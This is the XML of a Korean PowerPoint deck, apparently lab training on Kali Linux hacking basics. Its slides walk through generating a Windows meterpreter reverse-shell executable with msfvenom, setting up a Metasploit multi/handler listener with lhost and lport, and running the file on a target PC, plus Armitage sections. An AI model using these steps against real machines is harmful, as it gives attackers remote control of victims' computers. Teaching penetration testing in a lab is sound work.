          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428872" y="3411920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4508A507-D421-4363-9BB2-1B1C8E4FACC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489872" y="2330760"/>
            <a:ext cx="6114124" cy="583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A5B6C26C-EDA1-4A22-8644-5CEE4EA7B7FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472382" y="1968500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2) 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해킹파일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(.exe)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제작</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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0B4C7D99-80F9-477C-A4C4-F459350D5FEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="2435275"/>
            <a:ext cx="5913238" cy="110525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msfvenom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–p windows/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meterpreter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reverse_tcp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Lhost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=192.168.0.91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lport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=3102 –f exe &gt; /home/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kkb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/team2.exe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9B07603-59D7-48D2-9AAD-9DADCC025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62" y="4028015"/>
            <a:ext cx="5942698" cy="179688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55319D2-5206-488B-B7AD-6ADDEDDFF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22" y="5904632"/>
            <a:ext cx="5913238" cy="99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61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329930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1.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준비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0A925B45-CEDF-45C9-94E9-7C5C17032077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451772" y="2960760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D1E116AA-8D25-4B5F-B3B5-791A2D525E98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428872" y="3411920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4508A507-D421-4363-9BB2-1B1C8E4FACC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489872" y="2330760"/>
            <a:ext cx="6114124" cy="583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A5B6C26C-EDA1-4A22-8644-5CEE4EA7B7FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472382" y="1968500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3) Handler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진입</a:t>
            </a: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0B4C7D99-80F9-477C-A4C4-F459350D5FEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="2435276"/>
            <a:ext cx="5913238" cy="382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Use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p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2F7EA48-0D5E-4668-BE80-957FAC575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92" y="3010289"/>
            <a:ext cx="5890336" cy="600159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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A8B77B64-E96D-48B2-AB74-F7CC16742097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518074" y="3897196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4)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페이로드 경로 설정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F90B3D88-A94C-416C-B444-1D92EC1F466F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515892" y="4417180"/>
            <a:ext cx="5913238" cy="382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set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payload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windows/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meterpreter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reverse_tcp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69A7400-13E7-4B3A-BA97-8C786DFFF8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72" y="4956489"/>
            <a:ext cx="5913236" cy="466790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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125AEAC1-97FB-47CB-8215-EB9F3123D9D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515892" y="5806092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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>로컬호스트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설정</a:t>
            </a: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F96D4B57-C9FC-432C-A0DF-A18DB70BA15B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489872" y="6310048"/>
            <a:ext cx="5913238" cy="382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set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lhost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192.168.0.91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185EF14-4C3C-44FB-97DD-B480CE729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72" y="6822876"/>
            <a:ext cx="5895746" cy="523948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAA9A1C-B05E-4E57-92F1-2B884FD71699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489872" y="7636367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6)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로컬 포트 설정</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C48E60-81B2-4A90-9CB5-A478884C02E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481126" y="8098691"/>
            <a:ext cx="5913238" cy="382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Set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lport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3121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10EC05A-2291-491F-A9FB-F0BA454E7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80" y="8568459"/>
            <a:ext cx="5930727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34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329930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1.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준비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0A925B45-CEDF-45C9-94E9-7C5C17032077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451772" y="2960760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D1E116AA-8D25-4B5F-B3B5-791A2D525E98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428872" y="3411920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4508A507-D421-4363-9BB2-1B1C8E4FACC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489872" y="2330760"/>
            <a:ext cx="6114124" cy="583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A5B6C26C-EDA1-4A22-8644-5CEE4EA7B7FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472382" y="1968500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7) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>익스플로잇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 시작</a:t>
            </a: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0B4C7D99-80F9-477C-A4C4-F459350D5FEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="2435276"/>
            <a:ext cx="5913238" cy="382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exploit</a:t>
            </a:r>
          </a:p>
          <a:p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A8B77B64-E96D-48B2-AB74-F7CC16742097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460923" y="4074680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8)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대상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pc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에서 해킹파일 실행</a:t>
            </a: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125AEAC1-97FB-47CB-8215-EB9F3123D9D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472382" y="6745965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9) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>익스플로잇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 성공 확인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0CD44A8-AF6B-41BC-A2B8-6E1B5A9C6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6" y="2881692"/>
            <a:ext cx="5912882" cy="68589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986E5B5-8D74-4095-A5BC-943847FE2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72" y="4661481"/>
            <a:ext cx="2824828" cy="131738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CFD2243-D093-443C-B944-7DFC74137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92" y="7329531"/>
            <a:ext cx="5912882" cy="9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96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329930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명령어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0A925B45-CEDF-45C9-94E9-7C5C17032077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451772" y="2960760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D1E116AA-8D25-4B5F-B3B5-791A2D525E98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428872" y="3411920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4508A507-D421-4363-9BB2-1B1C8E4FACC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489872" y="2330760"/>
            <a:ext cx="6114124" cy="583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A5B6C26C-EDA1-4A22-8644-5CEE4EA7B7FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472382" y="1968500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1)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명령어 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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0B4C7D99-80F9-477C-A4C4-F459350D5FEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="2435276"/>
            <a:ext cx="5913238" cy="3829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?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D3372B-41DB-4D8A-A29A-6082E417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43" y="3676096"/>
            <a:ext cx="5826216" cy="5066274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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168B9EEC-7191-489A-B06E-51C5C3CF2117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460923" y="3235302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Core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명령어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1465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329930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명령어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0A925B45-CEDF-45C9-94E9-7C5C17032077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451772" y="2960760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D1E116AA-8D25-4B5F-B3B5-791A2D525E98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428872" y="3411920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MetaSploit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4508A507-D421-4363-9BB2-1B1C8E4FACC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489872" y="2330760"/>
            <a:ext cx="6114124" cy="583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168B9EEC-7191-489A-B06E-51C5C3CF2117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460923" y="1871178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FileSystem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명령어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709E2C1-C4BE-4C01-ABCA-B6E7297DC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18" y="2392999"/>
            <a:ext cx="5679790" cy="417253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730731B-80AA-45AB-97A0-172A17A2D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17" y="7113722"/>
            <a:ext cx="5679789" cy="2276793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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9B5CEEE8-F64F-4C49-9278-9397D71D5B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="6627770"/>
            <a:ext cx="5913236" cy="3549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Networking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명령어</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="752633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2574</TotalTime>
  <Words>938</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>A4 용지(210x297mm)</PresentationFormat>
  <Paragraphs>177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0" baseType="lpstr">
      <vt:lpstr>DX국민시대</vt:lpstr>
      <vt:lpstr>Noto Sans Korean</vt:lpstr>
      <vt:lpstr>굴림</vt:lpstr>
      <vt:lpstr>나눔스퀘어_ac Bold</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>Kali Linux 해킹 기초</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Ⅰ. METASPLOIT</vt:lpstr>
      <vt:lpstr>1. MetaSploit 준비</vt:lpstr>
      <vt:lpstr>1. MetaSploit 준비</vt:lpstr>
      <vt:lpstr>1. MetaSploit 준비</vt:lpstr>
      <vt:lpstr>1. MetaSploit 준비</vt:lpstr>
      <vt:lpstr>2. MetaSploit 명령어</vt:lpstr>
      <vt:lpstr>2. MetaSploit 명령어</vt:lpstr>
      <vt:lpstr>2. MetaSploit 명령어</vt:lpstr>
      <vt:lpstr>2. MetaSploit 명령어</vt:lpstr>
      <vt:lpstr>2. MetaSploit 명령어</vt:lpstr>
      <vt:lpstr>2. MetaSploit 명령어</vt:lpstr>
      <vt:lpstr>2. MetaSploit 명령어</vt:lpstr>
      <vt:lpstr>2. MetaSploit 명령어</vt:lpstr>
      <vt:lpstr>2. MetaSploit 명령어</vt:lpstr>
      <vt:lpstr>3. MetaSploit 해킹</vt:lpstr>
      <vt:lpstr>3. MetaSploit 해킹</vt:lpstr>
      <vt:lpstr>3. MetaSploit 해킹</vt:lpstr>
      <vt:lpstr>3. MetaSploit 해킹</vt:lpstr>
      <vt:lpstr>3. MetaSploit 해킹</vt:lpstr>
      <vt:lpstr>3. MetaSploit 해킹</vt:lpstr>
      <vt:lpstr>Ⅱ. Armitage </vt:lpstr>
      <vt:lpstr>1. Armitage 설정</vt:lpstr>
      <vt:lpstr>2. Armitage 시작</vt:lpstr>
      <vt:lpstr>2. Armitage 시작</vt:lpstr>
      <vt:lpstr>2. Armitage 시작</vt:lpstr>
      <vt:lpstr>2. Armitage 시작</vt:lpstr>
      <vt:lpstr>2. Armitage 시작</vt:lpstr>
      <vt:lpstr>2. Armitage 시작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ehee0</dc:creator>
  <cp:lastModifiedBy>KITRI</cp:lastModifiedBy>
  <cp:revision>192</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-07T11:57:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-30T08:58:31Z</dcterms:modified>
</cp:coreProperties>
</file>